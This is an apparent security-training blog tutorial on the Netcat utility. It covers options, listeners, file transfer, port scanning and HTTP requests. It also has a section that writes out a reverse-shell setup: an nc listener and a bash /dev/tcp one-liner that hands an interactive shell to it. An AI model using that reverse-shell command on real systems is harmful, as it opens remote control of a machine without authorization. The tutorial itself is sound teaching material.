Netcat (often abbreviated as nc) is a lightweight yet powerful UNIX utility that facilitates reading and writing data across network connections using the TCP or UDP protocol. Designed as a versatile “back-end” tool, it can be used directly or integrated into scripts and other programs.
Moreover, Netcat serves as an advanced network debugging and exploration tool, allowing users to establish various types of network connections and leverage built-in features.
Basic Usage
To establish a connection to a specified host and port:
nc host portHelp Menu
To display available options and usage information:
netcat -hOptions Overview:
- -c : Execute shell commands (similar to -e; potentially unsafe)
- -e : Execute a specified program after connecting (potential security risk)
- -b : Allow broadcasts
- -g : Specify source-routing hop points (up to 8)
- -G : Define source-routing pointer (values: 4, 8, 12, etc.)
- -i : Set delay interval for sent lines or scanned ports
- -k : Enable keep-alive option
- -l : Listen mode for incoming connections
- -n : Use numeric-only IP addresses (bypass DNS resolution)
- -o : Output hex dump of traffic to a file
- -p : Specify a local port number
- -r : Randomize local and remote ports
- -q : Quit after EOF on stdin with specified delay
- -s : Set local source address
- -T : Set Type of Service (ToS)
- -t : Respond to TELNET negotiation
- -u : Enable UDP mode
- -v : Enable verbose mode (use twice for more verbosity)
- -w : Set timeout for connections and final reads
- -C : Send CRLF as line-ending
- -z : Zero-I/O mode (commonly used for scanning)
Practical Use Cases
1. Listening on a Port
To start listening on a port, open two terminal windows:
Terminal 1 (Listening on Port 1234):
nc -l -p 1234Terminal 2 (Connecting to Port 1234):
nc 127.0.0.1 1234Once connected, any message entered in Terminal 2 will be received in Terminal 1, confirming successful communication.
2. Transferring Data
To send a file between two terminals:
Terminal 1 (Receiving Data):
nc -l -p 1234 > output.txtTerminal 2 (Sending Data):
echo "armourinfosec" > input.txt
nc 127.0.0.1 1234 < input.txt3. Port Scanning
To check the status of ports on a target system:
Scan a Single Port:
netcat -z -v 127.0.0.1 1234Scan Multiple Ports:
nc -z -v 127.0.0.1 1234 1235Scan a Range of Ports:
nc -z -v 127.0.0.1 1233-12404. Sending an HTTP Request
To send an HTTP GET request:
printf "GET /nc.1 HTTP/1.1\r\nHost: armourinfosec.com\r\n\r\n" | nc armourinfosec.com 805. Creating a Reverse Shell
Step 1: Start a Listener
nc -nlvp 5555Replace 5555 with the desired port.
Step 2: Connect from Target System
bash -c 'exec bash -i &>/dev/tcp/127.0.0.1/5555 <&1'This establishes a reverse shell from the target system to the listener.
6. Simple Chat with Netcat
To establish a basic chat session:
Terminal 1 (Listening for Messages):
nc -lp 1234Terminal 2 (Connecting and Sending Messages):
nc 127.0.0.1 1234Netcat is an invaluable tool for network administrators, ethical hackers, and developers. Whether used for troubleshooting, port scanning, file transfers, or setting up reverse shells, its flexibility makes it an essential component of any UNIX toolkit.
You may also like:- How to Use Shell Scripting for Penetration Testing
- How to Use Security Testing Tools for CISSP Exam
- How to Use Kali Linux for OSINT Automation
- Top Cybersecurity Certifications That Will Be in Demand in 2030
- Top 4 Best Cybersecurity Certifications That Lead to Six-Figure Salaries
- How to Use CISSP Certification to Advance Your Career Long-Term
- 37 Key Checks for Effective Bug Bounty Hunting
- CISSP Exam Format Explained – What to Expect on Test Day
- The OWASP Top 10 – What CISSP Candidates Must Know
- How UEBA (User and Entity Behavior Analytics) Enhances SIEM Capabilities
